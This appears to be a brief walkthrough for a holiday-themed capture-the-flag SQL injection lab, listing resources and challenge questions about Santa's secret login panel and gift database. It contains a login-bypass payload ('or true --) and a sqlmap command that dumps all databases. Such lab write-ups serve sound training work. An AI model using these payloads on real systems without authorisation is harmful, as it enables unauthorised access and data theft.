Someone stole Santa's gift list!

Web Exploitation ; sql injection ; sqli ; sqlmap

Video

Resources

List of SQL Commands: https://www.codecademy.com/articles/sql-commands

Check out this cheat sheet: swisskyrepo/PayloadsAllTheThings

Payload list: payloadbox/sql-injection-payload-list

In-depth SQL Injection tutorial: SQLi Basics

SQLMAP cheatsheet

Challenge

Without using directory brute forcing, what's Santa's secret login panel?

Visit Santa's secret login panel and bypass the login using SQLi

Username 'or true --

Password '--

How many entries are there in the gift database?

Save Item

sqlmap -r santapanel.req --tamper=space2comment --dump-all -dbms sqlite

What did Paul ask for?

What is the flag?

What is admin's password?

Last updated

Was this helpful?